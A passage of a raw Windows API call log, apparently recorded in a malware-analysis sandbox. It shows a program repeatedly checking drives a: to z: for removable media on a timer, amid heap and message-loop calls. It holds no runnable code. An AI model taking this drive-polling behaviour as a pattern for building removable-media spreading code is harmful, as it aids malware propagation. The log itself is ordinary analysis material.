Flags=0x0, Size=0x10) returned 0x14bd298 [0216.912] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0216.912] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0216.912] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0216.912] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef8c0 [0216.912] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef770 [0216.912] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0216.912] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0216.913] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0216.913] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0216.913] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0216.913] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0216.913] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0216.913] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0216.914] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0216.914] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0216.914] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0216.914] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0216.914] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0216.915] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0216.915] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0216.915] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0216.915] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0216.915] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0216.916] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0216.916] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0216.916] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0216.916] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0216.917] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0216.917] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0216.917] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0216.917] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0216.917] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0216.917] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0216.918] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0216.918] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0216.918] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0216.918] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0216.918] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fef38 | out: hHeap=0x12c0000) returned 1 [0216.918] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0216.918] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0216.918] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0216.918] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef770 [0216.918] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0216.918] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd370 [0216.918] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0216.918] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0216.919] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7a0 [0216.919] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd340 [0216.919] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef880 [0216.919] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1325e20 [0216.919] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0216.919] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0216.919] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0216.919] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0216.919] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1325e20 | out: hHeap=0x12c0000) returned 1 [0216.919] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef880 | out: hHeap=0x12c0000) returned 1 [0216.919] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0216.919] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e340 [0216.919] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0216.919] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e340 | out: hHeap=0x12c0000) returned 1 [0216.919] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0216.919] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0216.919] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0216.919] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8c0 | out: hHeap=0x12c0000) returned 1 [0216.919] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd370 | out: hHeap=0x12c0000) returned 1 [0216.919] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0216.920] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0216.920] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0216.920] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0216.920] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0216.920] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0216.920] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7a0 [0216.920] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0216.920] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0216.920] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef870 [0216.920] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318c78 [0216.920] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0216.920] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318c78 | out: hHeap=0x12c0000) returned 1 [0216.920] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef870 | out: hHeap=0x12c0000) returned 1 [0216.920] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd1d8 [0216.920] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318d98 [0216.920] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0216.920] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7b0 [0216.920] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fef38 [0216.920] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0216.920] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0216.920] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0216.920] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0216.920] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0216.920] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0216.920] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef6e0 [0216.920] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef770 [0216.920] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0216.921] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0216.921] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0216.921] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0216.921] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0216.921] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0216.921] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0216.921] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0216.921] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0216.922] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0216.922] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0216.922] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0216.922] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0216.922] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0216.923] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0216.923] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0216.923] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0216.923] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0216.924] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0216.924] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0216.924] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0216.924] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0216.924] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0216.924] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0216.925] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0216.925] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0216.925] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0216.925] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0216.925] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0216.925] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0216.925] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0216.925] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0216.925] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fef38 | out: hHeap=0x12c0000) returned 1 [0216.925] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7b0 | out: hHeap=0x12c0000) returned 1 [0216.926] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fef38 [0216.926] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0216.926] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7a0 [0216.926] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0216.926] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0216.926] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0216.926] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 1 [0216.926] TranslateMessage (lpMsg=0x7dfb8c) returned 0 [0216.926] DispatchMessageW (lpMsg=0x7dfb8c) returned 0x0 [0216.926] KillTimer (hWnd=0x802d6, uIDEvent=0x1) returned 1 [0216.926] SetTimer (hWnd=0x802d6, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0216.926] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0216.926] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7b0 [0216.926] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0216.926] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0216.926] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1325f80 [0216.926] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0216.926] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0216.926] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0216.927] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0216.927] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1325f80 | out: hHeap=0x12c0000) returned 1 [0216.927] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0216.927] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7b0 | out: hHeap=0x12c0000) returned 1 [0216.927] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e0c0 [0216.927] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0216.927] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e0c0 | out: hHeap=0x12c0000) returned 1 [0216.927] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0216.927] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318d98 | out: hHeap=0x12c0000) returned 1 [0216.927] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0216.927] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6e0 | out: hHeap=0x12c0000) returned 1 [0216.927] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0216.927] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0216.927] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0216.927] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0216.927] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fef38 | out: hHeap=0x12c0000) returned 1 [0216.927] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0216.927] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0216.927] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef770 [0216.927] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0216.927] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0216.927] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef850 [0216.927] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0216.927] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0216.927] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0216.927] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef850 | out: hHeap=0x12c0000) returned 1 [0216.927] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd1d8 [0216.928] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0216.928] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0216.928] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8a0 [0216.928] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0216.928] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0216.928] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef800 [0216.928] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0216.928] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0216.928] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0216.928] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd358 [0216.928] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef730 [0216.928] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef800 [0216.928] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fec40 [0216.928] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0216.928] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0216.928] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0216.928] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0216.928] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0216.929] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0216.929] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0216.929] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0216.929] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0216.929] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0216.930] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0216.930] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0216.930] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0216.930] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0216.930] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0216.931] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0216.931] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0216.931] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0216.931] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0216.931] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0216.932] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0216.932] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0216.932] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0216.932] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0216.932] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0216.933] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0216.933] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0216.933] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fec40 | out: hHeap=0x12c0000) returned 1 [0216.933] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0216.933] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0216.933] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0216.933] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0216.933] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0216.933] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0216.933] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0216.934] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef8c0 [0216.934] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0216.934] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd370 [0216.934] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0216.934] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0216.934] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef770 [0216.934] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0216.934] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef860 [0216.934] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1326000 [0216.934] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0216.934] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0216.934] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0216.934] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0216.934] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1326000 | out: hHeap=0x12c0000) returned 1 [0216.934] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef860 | out: hHeap=0x12c0000) returned 1 [0216.934] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0216.934] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e0c0 [0216.934] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0216.934] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e0c0 | out: hHeap=0x12c0000) returned 1 [0216.934] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0216.935] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0216.935] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd358 | out: hHeap=0x12c0000) returned 1 [0216.935] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0216.935] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd370 | out: hHeap=0x12c0000) returned 1 [0216.935] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0216.935] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0216.935] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8c0 | out: hHeap=0x12c0000) returned 1 [0216.935] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0216.935] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0216.935] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0216.935] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef860 [0216.935] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef860 | out: hHeap=0x12c0000) returned 1 [0216.935] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0216.935] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef850 [0216.935] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0216.935] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0216.935] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0216.935] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef850 | out: hHeap=0x12c0000) returned 1 [0216.935] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd2f8 [0216.935] RtlAllocateHeap 